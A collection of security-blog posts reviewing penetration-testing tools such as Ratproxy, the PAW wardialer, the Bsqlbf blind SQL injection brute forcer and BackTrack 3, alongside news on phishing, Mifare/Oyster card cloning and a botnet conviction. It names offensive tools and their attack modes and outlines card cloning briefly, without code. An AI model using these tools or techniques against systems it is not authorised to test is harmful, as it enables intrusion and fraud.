Ratproxy is a semi-automated, largely passive web application security audit tool. It is meant to complement active crawlers and manual proxies more commonly used for this task, and is optimized specifically for an accurate and sensitive detection, and automatic annotation, of potential problems and security-relevant design patterns based on the observation of existing, user-initiated traffic in complex web 2.0 environments.

The proxy analyzes problems such as cross-site script inclusion threats, insufficient cross-site request forgery defenses, caching issues, potentially unsafe cross-domain code inclusion schemes and information leakage scenarios, and much more.

Why Ratproxy?

There are numerous alternative proxy tools meant to aid security auditors - most notably WebScarab, Paros, Burp, ProxMon, and Pantera. Stick with whatever suits your needs, as long as you get the data you need in the format you like.

That said, ratproxy is there for a reason. It is designed specifically to deliver concise reports that focus on prioritized issues of clear relevance to contemporary web 2.0 applications, and to do so in a hands-off, repeatable manner. It should not overwhelm you with raw HTTP traffic dumps, and it goes far beyond simply providing a framework to tamper with the application by hand.

You can download Ratproxy here:

ratproxy-1.51.tar.gz

Or read more here.

The tool should run on Linux, *BSD, MacOS X, and Windows (Cygwin). Since it is in beta, there might be some kinks to be ironed out, and not all web technologies might be properly accounted for.

Tags:  cross-site-scripting,  hacking,  Hacking Tools,  hacking-web-applications,  ratproxy,  Web Hacking,  web security assessment,  web-application-security,  XSS

It seems like the Phishing crews at trying to get some new ideas on how to con people into giving away their credentials and leaking info.

The latest target appears to be Google Calendar.

As always be on your guard as these scams are coming from all directions.

A few months ago, spam came to Google Calendar. Now phishing has arrived.

Intrepid Google watcher Philipp Lenssen wrote late last week about being the target of a phishing attempt via Google Calendar.

He received an e-mail to his Gmail account with a reference to a legitimate event from his calendar. The sender was listed as “customer care,” and it asked him to verify his account by supplying his username and password.

It seems to the same old style as normal e-mail phishing but utilising the Google Calendar interface. It comes bundled with the usual spelling and grammatical errors that plague phishing e-mails.

I wonder how many people are falling for this one? If generic phishing ploys are anything to go by…it will be quite a lot.

On May 28, a Google Talk Guide addressed the issue in a Google Groups thread, urging users to click the “Report Phishing” link if they receive suspicious e-mails and not to click on links within the e-mails or open attachments.

Late on Monday, a Google representative e-mailed this statement: “Spam is an issue for all Internet users, and we work very hard to fight it. Using Google Calendar, or any Google product, to send spam is a violation of our product policies. We are actively identifying Calendar accounts that send spam and disabling them.”

Perhaps drop a note to any non-tech friends using Google Calendar just to warn them that this is happening.

You might save someone a lot of trouble.

Source: Cnet (Thanks to Navin)

Tags:  google,  google calendar,  phishers,  Phishing,  Privacy,  scammers,  Social Engineering,  spammers

Now this is an oldskool topic, wardialling! Some people still ask me about wardialling tools though, so here’s one I found recently written in Python.

PAW / PAWS is a wardialing software in python. It is designed to scan for ISDN (PAWS only) and “modern” analog modems (running at 9.6kbit/s or higher). Wardialing tools are - despite their martialic naming - used to find nonauthorized modems so one can disable those and as result make access to the internal network harder.

For PAW list all numbers you want to be dialed into the (text) file “dial.lst”, one in each line - numbers only, no spaces, plus signs, dashes or slashes please.

For PAWS the numbers are accompanied by the ISDN modes to be tested in the (text) file “dial.lst” in the exact format you find in the example file (you can delete individual ISDN types, though), one in each line - numbers only, no spaces, plus signs, dashes or slashes please. A syntax check of any kind is effectively non-existant, so be careful.

Make sure the device your modem is attached to is set correctly in paw.py in the variable “tty” at the top of the file.

Then simply call “./paw.py” or “./paws.py” and watch - a verbatim full log will be written into paw_dialing.log where CR, LF and TAB will be translated into readable equivalents. For PAW an additional summary will be written as CSV file in paw_dialing.csv

You can download PAW/PAWS here:

paw.tar.gz (analog wardialer only)

paws.tar.gz (ISDN & analog wardialing)

Or read more here.

Tags:  hacking pbx,  hacking-phones,  hacking-software,  paw,  python advanced wardialing system,  war dialing,  wardialer,  wardialing,  wardialing software

It looks like China is becoming a hotbed for malware and malicious websites (those sites that push malware infections via browser exploits).

They often used to be found in Korea and Taiwan and parts of Eastern Europe. According to the latest data more than half of the sites are now located in China.

More than half of the Web sites foisting malicious software on visitors are located at networks in China, according to data released today.

Stopbadware.org, a joint project between researchers at Harvard, Oxford and Google, found that 52 percent of the more than 200,000 infected sites the group analyzed in late May were hosted at Chinese networks. In contrast, U.S.-based networks accounted for 21 percent of the bad sites, Stopbadware found.

The sites examined in the study were all reported as malicious by Google, which interestingly enough ranked as the 6th largest source of malicious Web sites in this report, with 4,261 malware sites. Most of those appear to be the result of scammers and virus writers devising ways to automate the creation of sites at Google-owned Blogger.com.

It’s somewhat ironic that it’s Google that labels malware sites…but a Google owned property is in the top 10 for malicious web sites!

With Blogger.com coming in as the 6th largest source of malware…I really think it’s something Google needs to take a serious look at.

The numbers from just one month prior paint a much harsher picture for Google. Stopbadware never published these figures, but a source involved in the group’s effort shared data with Security Fix showing Google and Blogger as the 4th largest source of malicious sites, with more than 10,000 such domains. See the comparison charts by clicking on the graphic to the left.

Max Weinstein, project manager for Stopbadware, said the group plans to begin releasing stats on a monthly basis. Weinstein said he believes the spike in malicious domains at Google properties was due to the company’s recent aggressiveness in scanning its own sites for malware.

“When that first happened, Google’s numbers shot way up,” Weinstein said.

Hmm interesting indeed, we’ll have to watch and see what Google is going to do about this, they really need to control it. Especially with many of the new botnet infectors leveraging on Blogger.com sites.

Source: Washington Post

Tags:  blogger,  blogspot,  china,  google,  hacked sites,  hacked websites,  hacking-websites,  malicious hosts,  malicious traffic,  malware,  stopbadware,  Web Hacking

There are quite a lot of SQL Injection Tools available and now there is one more to add to the stable for testing - Bsqlbf V2, which is a Blind SQL Injection Brute Forcer.

The original tool (bsqlbfv1.2-th.pl) was intended to exploit blind sql injection against a mysql backend database, this new version supports blind sql injection against the following databases:

• MS-SQL
• MY-SQL
• PostgreSQL
• Oracle

It supports injection in string and integer fields. The feature which separates this tool from all other sql injection tools is that it supports custom SQL queries to be supplied with the -sql switch.

It supports 2 modes of attack:

1. Type 0: Blind SQL Injection based on True And Flase response
2. Type 1: Blind SQL Injection based on True And Error Response(details)

You can download Bsqlbf V2 here:

bsqlbf-v2.1.zip

Or read more here.

Tags:  blind-sql-injection,  bsqlbf,  hacking mysql,  hacking sql,  Hacking Tools,  hacking-web-applications,  ms-sql,  mysql blind sql injection,  Oracle,  perl,  perl script,  postgres,  sql-brute-force,  sql-injection,  sql-injection-tool

It just goes to show, having an aluminium lined wallet could really be useful! Hackers in the Netherlands found they could clone an access card using the Mifare chip, after that they traveled to London to try their technique out on the Oyster card (used on the London Underground), which uses the same chip.

It just goes to show…implementation of these cards really isn’t good yet.

Dutch security researchers rode the London Underground free for a day after easily using an ordinary laptop to clone the “smartcards” commuters use to pay fares, a hack that highlights a serious security flaw because similar cards provide access to thousands of government offices, hospitals and schools.

There are more than 17 million of the transit cards, called Oyster Cards, in circulation. Transport for London says the breach poses no threat to passengers and “the most anyone could gain from a rogue card is one day’s travel.” But this is about more than stealing a free fare or even cribbing any personal information that might be on the cards.

Oyster Cards feature the same Mifare chip used in security cards that provide access to thousands of secure locations. Security experts say the breach poses a threat to public safety and the cards should be replaced.

Apparently they can only use the cloned card for one day’s travel, but still…what would stop them from doing it every day?

Or cloning an access card to a more important place and wreaking some havoc there.

The hackers scanned one of the Underground’s many card readers to collect the cryptographic key that purportedly keeps the system secure. The keys were uploaded to a laptop, essentially turning them into portable card readers. The hackers then brushed up against passengers to wirelessly upload the information on their Oyster cars. That information in hand, it was a simple matter of using it to program new cards.

Jacobs says the same technique can clone smartcards that provide access to secure buildings. “An employee can be cloned by bumping into that person with a portable card reader,” he told the Times. “The person whose identity is being stolen may then be completely unaware that anything has happened. At the technical level there are currently no known countermeasures.”

So break out your tinfoil hats and alumnium hats, the smartcard hackers are coming to a building near you soon.

The Dutch government are taking this VERY seriously, planning to replace all 120,000 smart cards used by their employees for access. That will be an expensive excercise.

I wonder will Oyster make any changes following the media coverage on this?

And what rights does a consumer have after their card is cloned and their credit used, are they insured? Would they even notice? Who’s responsiblity is it?

Source: Wired Blog (Thanks to razta).

Tags:  access card,  cracking,  crypography,  hacking,  hacking oyster card,  london tube,  london underground,  mifare,  oyster card,  portable card reader,  security tag,  smart card,  tag

You might remember a while ago we mentioned MP3 spam, which in October last year was the latest evolution in spam.

Currently there is a new type annoying mail-server owners the world over, it’s known as NDR or Backscatter Spam and involved NDRs or Non Delivery Reports (those emails you get when you send a mail to a non-working or no longer active account).

Research shows that up to 90% of emails received by companies are spam, and spammers have adopted a variety of methods to bypass spam filters used in anti-spam software. In the beginning, spam was mainly text based but over the past few years, spammers have resorted to using embedded images and attaching common file types such as mp3s and Excel documents in emails to gain access to mailboxes. Another option is NDR or non-delivery report spam.

NDRs are a common part of email exchanges. Users receive NDRs, for example, when an email does not arrive at a recipient’s address and notification is sent to the sender. However, spammers can cause a considerable increase in NDR activity because they send junk mail to thousands of email addresses. Some are genuine but others are not and these are used to generate NDR messages by manipulating the ‘From’ address to use a real domain sender. This results in email users receiving NDRs from people they had never sent an email to in the first place.

This white paper explains what NDR spam is and how administrators can take effective measures to reduce the impact on their email servers.

To download a copy of the white paper, please visit:

http://www.gfi.com/whitepapers/ndr-spam.pdf [PDF]

Tags:  anti-spam,  backscatter,  gfi,  ndr,  ndr spam,  non delivery report,  non delivery report spam,  scammers,  spam,  spammers,  whitepaper

If you don’t know, BackTrack is a top rated linux live distribution focused on penetration testing. With no installation whatsoever, the analysis platform is started directly from the CD-Rom and is fully accessible within minutes.

Back in January we mentioned the BackTrack Live Hacking CD BETA 3 was released, at last the final version is ready for download!

New Stuff

SAINT
SAINT has provided BackTrack users with a functional version of SAINT, pending a free request for an IP range license through the SAINT website, valid for 1 year.

Maltego
The guys over at Paterva have created a special version of Maltego v2.0 with a community license especially for BackTrack users. We would like to thank Paterva for co-operating with us and allowing us to feature this amazing tool in BackTrack.

Nessus
Tenable would not allow for redistribution of Nessus on BackTrack 3.

Kernel
2.6.21.5. Yes, yes, stop whining….We had serious deliberations concerning the BT3 kernel. We decided not to upgrade to a newer kernel as wireless injection patches were not fully tested and verified. We did not want to jeopardize the awesome wireless capabilities of BT3 for the sake of sexiness or slightly increased hardware compatibilities. All relevant security patches have been applied.

Tools
As usual, updated, sharpened, SVN’ed and armed to the teeth. This release we have some special features such as spoonwep, fastrack and other cool additions.

Availability

For the first time we distribute three different version of Backtrack 3:

• CD version
• USB version
• VMWare version

You can download BackTrack 3 Final here:

http://remote-exploit.org/backtrack_download.html

Or read more here.

Tags:  auditor,  backtrack,  backtrack 3,  backtrack hacking livecd,  backtrack live hacking cd,  hacking,  Hacking Tools,  hacking-livecd,  live security cd,  live-hacking-cd,  livecd,  maltego,  metasploit,  penetration-testing,  saint,  top hacking cds,  whax

Another one bites the dust with another reasonably hefty sentence, this time a botherder or botnet master.

Just under 4 years and a big chunk of change as a fine, I guess he probably has plenty of cash stashed somewhere though. These guys can really rake it in with their mass infectors of doom.

A US-based hacker has been sentenced to 41 months in jail for breaking into corporate computers in Europe and making them part of a money-generating botnet.

Robert Matthew Bentley, 21, of Panama City, Florida, was also ordered to perform three years of supervised release once his prison time is over and to pay $65,000 in restitution, according to federal prosecutors in Pensacola, Florida.

In March, Bentley, who sometimes went by the alias LSDigital, pleaded guilty to two felony counts related to his botnet activities, which inflicted more than $150,000 worth of damage on Newell Rubbermaid. Starting as early as December 2006, Bentley and several unnamed co-conspirators installed customized bots on hundreds of the company’s computers. The malware generated so much traffic on Rubbermaid’s servers that its network stopped functioning.

He pleaded guilty which might have saved him from getting an even heavier punishment, I guess he know they had enough evidence to nail him soundly so he may as well look after his interests.

I wonder if his conspirators will get busted too?

New infections from the attack were being detected as recently as March, four months after Bentley was arrested. Federal agents continue to investigate the uncharged suspects. At least one of them lived in Philadelphia.

Federal prosecutors began their case after the Metropolitan Police Computer Crime Unit in London fielded a complaint from Rubbermaid representatives in Europe. According to court documents, Bentley and his cronies generated “thousands of dollars” by installing adware from DollarRevenue.com on the infected machines.

The bot masters used the domain name smokedro.com as a command and control channel. They breached Newell Rubbermaid using at least three malicious files bearing the names 84785_redworld[1].exe, mssecure.exe and msiupdate.exe.

It looks like they had it pretty well wrapped up and by the looks of it (new infection in March) they are still going strong.

I wonder what the status is now?

They were busted as part of the FBI campaign known as Operation Bot Roast.

Source: The Register

Tags:  botmaster,  botnets,  dollarrevenue,  lsdigital,  malware,  robert matthew bentley,  rubbermaid,  smokedro,  trojans,  viruses,  worms

Technitium MAC Address Changer allows you to change Media Access Control (MAC) Address of your Network Interface Card (NIC) irrespective to your NIC manufacturer or its driver. It has a very simple user interface and provides ample information regarding each NIC in the machine. Every NIC has a MAC address hard coded in its circuit by the manufacturer. This hard coded MAC address is used by windows drivers to access Ethernet Network (LAN). This tool can set a new MAC address to your NIC, bypassing the original hard coded MAC address. Technitium MAC Address Changer is a must have tool in every security professionals tool box. Technitium MAC Address Changer is coded in Visual Basic 6.0.

Features

• Support for Windows Vista SP1 and Windows Server 2008 added.
• Allows you to remove all registry entries corresponding to Network Adapter that is no longer physically installed on the system.
• Allows you to configure Internet Explorer HTTP proxy settings through configuration presets or command line.
• Issues with installer program resolved. (Thanks to all your feedbacks)
• Identifies the preset applied to currently selected Network Interface Card (NIC) automatically making it easy to identify settings.
• Most known issues with Windows Vista removed. (Thanks to all your feedbacks)
• Changes MAC address of Network Interface Card (NIC) including Wireless LAN Cards, irrespective of its manufacturer or its drivers.
• Has latest list of all known manufacturers (with corporate addresses) to choose from. You can also enter any MAC address and know which manufacturer it belongs to.
• Allows you to select random MAC address from the list of manufacturers by just clicking a button.
• Restarts your NIC automatically to apply MAC address changes instantaneously.
• Allows you to create Configuration Presets, which saves all your NIC settings and makes it very simple to switch between many settings in just a click and hence saves lot of time.
• Allows you to Import or Export Configuration Presets to or from another file, which saves lot of time spent in reconfiguration.
• Allows you to load any Configuration Presets when TMAC starts by just double clicking on any Configuration Preset File. (*.cpf file extension)
• Has command line interface which allows you to perform all the tasks from the command prompt or you can even create a DOS batch program to carry out regular tasks. (see help for command line parameter details)
• Allows you to export a detailed text report for all the network connections.
• Displays all information you would ever need to know about your NIC in one view like Device Name, Configuration ID, Hardware ID, Connection Status, Link Speed, DHCP details, TCP/IP details etc.

You can download Technitium v5 here:

Technitium-MAC-Address-Changer

Or read more here.

Tags:  change mac address,  change mac address windows,  free-software,  freeware mac changer,  mac address changer,  mac-changer,  network-security,  Security Software,  technitium,  technitium mac adress changer,  tmac